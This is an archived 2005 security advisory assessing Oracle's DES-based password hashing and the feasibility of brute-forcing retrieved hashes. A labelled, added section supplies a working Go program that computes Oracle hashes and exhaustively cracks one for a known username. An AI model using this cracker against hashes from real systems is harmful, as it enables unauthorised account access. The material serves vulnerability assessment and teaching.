The OpenNET Project
 
[NEWS] Oracle Password Hashing Algorithm Assessment


From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 15 Nov 2005 12:41:46 +0200
Subject: [NEWS] Oracle Password Hashing Algorithm Assessment
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20051115112743.4AF1057BC@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Oracle Password Hashing Algorithm Assessment
------------------------------------------------------------------------


SUMMARY

In this paper the authors examine the mechanism used in Oracle databases 
to protect users' passwords. The paper explains how the hash is 
generated and shows the feasibility of a brute-force attack on retrieved 
hashes. It also lists several practices that help secure the hashes 
against brute-forcing.

DETAILS

The Algorithm:
1. Concatenate the username and the password to produce a plaintext 
string;
2. Convert the plaintext string to uppercase characters;
3. Convert the plaintext string to multi-byte storage format: each 
character becomes two bytes, and ASCII characters have the high byte set 
to 0x00;
4. Encrypt the plaintext string (padded with 0x00 bytes if necessary to a 
multiple of the 8-byte DES block size) using the DES algorithm in cipher 
block chaining (CBC) mode, with an all-zero IV and a fixed key value of 
0x0123456789ABCDEF;
5. Encrypt the plaintext string again with DES-CBC (again with a zero IV), 
this time using the last block of the output of the previous step 
(parity bits ignored) as the encryption key. The last block of this 
second output, rendered as 16 uppercase hexadecimal digits, is the stored 
password hash value.

Nothing random enters the computation: a given username and password 
always yield the same hash in any database, and because of step 2 the 
hash does not depend on the case of the password.

Brute-Force Attack:
Given the weak Oracle password hashing mechanism, it is practical for an 
attacker with commodity hardware to exhaust every password up to a modest 
length and so recover the plaintext behind a retrieved hash. Using a 
standard Intel Pentium 4 2.8 GHz workstation with OpenSSL 0.9.8-beta3, the 
authors achieved a rate of approximately 830,000 password hashes per 
second on a 32-byte data block. For a password of 8 alphanumeric 
characters (36^8, roughly 2.8 trillion candidates) and a known username 
of 8 characters, an attacker could compute every possible password for a 
particular account in approximately 39.3 days on similar hardware, and 
would expect to recover the plaintext after about half that, roughly 20 
days. This is especially problematic for organizations whose password 
expiration period is longer than 20 days, since an attacker is then 
likely to produce the plaintext password before the account password is 
changed.

Two properties of the scheme make this worse than the raw rate suggests. 
The username is the only "salt", and it is known to anyone who can read 
the hash, so all of the work goes into password candidates alone; and 
because the input is uppercased, mixed-case passwords gain nothing: a 
password drawn from letters and digits has an effective alphabet of 36 
symbols, not 62.
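The following is an added worked example of both passages above: the five-step hash (the scheme Oracle used through 10g; 11g introduced a salted SHA-1 hash alongside it) and a small-keyspace brute force against it. It is not code from the SANS paper or from SecuriTeam; it uses Go's standard-library crypto/des. Assumptions beyond the advisory text: an all-zero IV for both CBC passes (not stated above, but what Oracle and the public cracker implementations use), the well-known default-account hash SCOTT/TIGER = F894844C34402B67 as the check value, and the function names OracleHash, CrackOracleHash and ExhaustiveSearchDays, which are this example's own.

```go
package main

import (
	"crypto/cipher"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"math"
	"strings"
	"unicode/utf16"
)

// fixedKey is the constant first-pass DES key from step 4 of the algorithm.
var fixedKey = []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF}

// Both CBC passes use an all-zero IV. The advisory omits the IV; this is
// the value Oracle and the public cracker implementations use (assumption
// relative to the text above, not something the advisory states).
var zeroIV = make([]byte, des.BlockSize)

// oraclePlaintext performs steps 1-3: concatenate, uppercase, widen every
// character to two big-endian bytes (high byte 0x00 for ASCII) and zero-pad
// to a multiple of the 8-byte DES block size.
func oraclePlaintext(username, password string) []byte {
	codes := utf16.Encode([]rune(strings.ToUpper(username + password)))
	buf := make([]byte, 0, 2*len(codes)+des.BlockSize)
	for _, c := range codes {
		buf = append(buf, byte(c>>8), byte(c))
	}
	if rem := len(buf) % des.BlockSize; rem != 0 {
		buf = append(buf, make([]byte, des.BlockSize-rem)...)
	}
	return buf
}

// lastCBCBlock runs DES-CBC over pt under key and returns only the final
// ciphertext block, which is all the algorithm keeps from each pass.
func lastCBCBlock(key, pt []byte) []byte {
	block, err := des.NewCipher(key) // checks length only; parity bits are ignored
	if err != nil {
		panic(err) // unreachable: key is always exactly 8 bytes here
	}
	out := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, zeroIV).CryptBlocks(out, pt)
	return out[len(out)-des.BlockSize:]
}

// OracleHash returns the 16-hex-digit hash as stored in SYS.USER$.PASSWORD.
func OracleHash(username, password string) string {
	pt := oraclePlaintext(username, password)
	secondKey := lastCBCBlock(fixedKey, pt) // step 4: last block becomes the key
	return strings.ToUpper(hex.EncodeToString(lastCBCBlock(secondKey, pt))) // step 5
}

// CrackOracleHash tries every password over alphabet of length 1..maxLen for
// a known username and returns the first candidate whose hash matches.
// Because step 2 uppercases the input, an uppercase-only alphabet already
// covers every case variant of a letter-based password.
func CrackOracleHash(username, target, alphabet string, maxLen int) (string, bool) {
	target = strings.ToUpper(target)
	for n := 1; n <= maxLen; n++ {
		idx := make([]int, n) // odometer over alphabet positions
		cand := make([]byte, n)
		for {
			for i, k := range idx {
				cand[i] = alphabet[k]
			}
			if OracleHash(username, string(cand)) == target {
				return string(cand), true
			}
			pos := n - 1
			for ; pos >= 0; pos-- { // advance the odometer with carry
				idx[pos]++
				if idx[pos] < len(alphabet) {
					break
				}
				idx[pos] = 0
			}
			if pos < 0 {
				break // every n-character candidate has been tried
			}
		}
	}
	return "", false
}

// ExhaustiveSearchDays is the time to try every password of exactly `length`
// symbols from an alphabet of alphabetSize symbols at hashesPerSecond.
func ExhaustiveSearchDays(alphabetSize, length int, hashesPerSecond float64) float64 {
	return math.Pow(float64(alphabetSize), float64(length)) / hashesPerSecond / 86400
}

func main() {
	h := OracleHash("SCOTT", "TIGER")
	fmt.Println("SCOTT/TIGER           ->", h)
	fmt.Println("scott/tiger same hash ->", OracleHash("scott", "tiger") == h)
	pw, ok := CrackOracleHash("SCOTT", OracleHash("SCOTT", "CAT"), "ABCDEFGHIJKLMNOPQRSTUVWXYZ", 3)
	fmt.Println("recovered:", pw, ok)
	fmt.Printf("36^8 candidates at 830,000 hashes/s: %.1f days\n", ExhaustiveSearchDays(36, 8, 830000))
}
```

The ExhaustiveSearchDays call reproduces the paper's 39.3-day figure from its own numbers (36^8 candidates at 830,000 hashes per second), which also shows that the "alphanumeric" keyspace the authors counted is the case-folded one. A real cracker would go further than this example: with a fixed key, a zero IV and a known username prefix, the first-pass CBC blocks that cover only the username are identical for every candidate of the same length and can be computed once.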

The full paper can be found at: http://www.sans.org/info/911/


ADDITIONAL INFORMATION

The original article can be found at: http://www.sans.org/info/911/





DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



